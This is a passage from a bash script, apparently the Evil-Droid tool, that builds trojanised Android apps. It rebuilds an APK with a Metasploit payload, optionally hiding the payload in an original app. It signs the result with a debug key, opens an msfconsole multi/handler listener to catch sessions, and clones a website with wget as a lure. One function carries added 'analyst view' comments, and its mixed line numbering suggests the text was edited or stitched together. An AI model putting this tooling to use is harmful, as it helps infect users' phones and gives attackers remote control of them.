579 | sed -i "s|$label|$label1|g" $path/payload/AndroidManifest.xml 2>&1
580 | sed -i "s|MainActivity|$apk_name|g" $path/payload/res/values/strings.xml 2>&1
581 | mkdir $path/payload/res/drawable
582 | cp $iconos $path/payload/res/drawable/main_icon.png
583 | }
584 | #function signing apk
# Sign, verify and align the rebuilt package (evil.apk -> $apk_name.apk).
# Globals: yellow, red, lightgreen, apk_name (read); rc (written)
# Exits with the failing tool's status when verification or alignment fails,
# after stopping the apache2/postgresql services.
#
# Review note (analyst view): the package is signed with a keystore at
# ~/.android/debug.keystore, alias "androiddebugkey", store and key password
# "android", SHA1 digest and MD5withRSA signature. A debug-key certificate
# combined with these legacy algorithms on an app presented as a normal
# release is a useful anomaly to check during APK triage.
function sign()
{
  local keystore
  keystore=~/.android/debug.keystore

  echo -e $yellow ""
  echo "[*] Checking for ~/.android/debug.keystore for signing..."
  spinlong
  if [ ! -f "$keystore" ]; then
    echo -e $red ""
    echo " [ X ] Debug key not found. Generating one now..."
    spinlong
    # NOTE: the quoted "~/.android" is not tilde-expanded, so this tests a
    # literal relative path; kept exactly as in the original.
    if [ ! -d "~/.android" ]; then
      mkdir ~/.android > /dev/null 2>&1
    fi
    echo -e $lightgreen ""
    keytool -genkey -v -keystore "$keystore" -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000
  fi
  spinlong

  echo -e $yellow ""
  echo "[*] Attempting to sign the package with your android debug key"
  spinlong
  # The signing status itself is not checked; the -verify pass below decides.
  jarsigner -keystore "$keystore" -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA evil.apk androiddebugkey > /dev/null 2>&1

  echo -e $yellow
  echo "[*] Verifying signed artifacts..."
  spinlong
  jarsigner -verify -certs evil.apk > /dev/null 2>&1
  rc=$?
  if [ "$rc" != 0 ]; then
    echo -e $red ""
    echo "[!] Failed to verify signed artifacts"
    apache_svc_stop
    postgresql_stop
    exit $rc
  fi

  echo -e $yellow
  echo "[*] Aligning recompiled APK..."
  spinlong
  zipalign 4 evil.apk $apk_name.apk 2>&1
  rc=$?
  # "Done." is printed before the zipalign status is examined, as before.
  echo -e $yellow
  echo "[✔] Done."
  spinlong
  if [ "$rc" != 0 ]; then
    echo -e $red ""
    echo "[!] Failed to align recompiled APK"
    apache_svc_stop
    postgresql_stop
    exit $rc
  fi
  rm evil.apk > /dev/null 2>&1
}
634 | #function ask
635 | function quests()
636 | {
637 | while true; do
638 | echo ""
639 | quest=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose payload apk or original apk?" --radiolist --column "Choose" --column "Option" TRUE "APK-MSF" FALSE "ORIGINAL-APK" --width 305 --height 270 2> /dev/null)
640 | case $quest in
641 | APK-MSF) change_icon;spinlong;gen_payload;spinlong;apk_decomp;flagg;merge_name_ico;spinlong;apk_comp;spinlong;sign;return;;
642 | ORIGINAL-APK) orig_apk;spinlong;gen_payload;spinlong;up_apktook;apk_decomp1;spinlong;apk_decomp;flagg_original;spinlong;apk_comp1;spinlong;sign;return;;
643 | esac
644 | done
645 | }
646 | #function listeners
647 | function listener()
648 | {
649 | xterm -T "EVIL-DROID MULTI/HANDLER" -fa monaco -fs 10 -bg black -e "msfconsole -x 'use multi/handler; set LHOST $lanip; set LPORT $LPORT; set PAYLOAD $PAYLOAD; exploit'"
650 | }
651 | #function clone site
652 | function clns()
653 | {
654 | clone=$(zenity --title "☢ CLONE WEBSITE ☢" --text "PASTE LINK WEBSITE TO CLONE" --entry --width 400 2> /dev/null)
655 | }
656 | function index_name()
657 | {
658 | index=$(zenity --title "☢ INDEX NAME ☢" --text "example: wtf.html" --entry --entry-text "wtf" --width 300 2> /dev/null)
659 | echo -e $yellow ""
660 | echo "[*] Clone Website From URL..."
661 | spinlong
662 | wget $clone --no-check-certificate -O $index.html -c -k -U "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0" > /dev/null 2>&1
663 | }
664 | function launcher()
665 | {
666 | echo '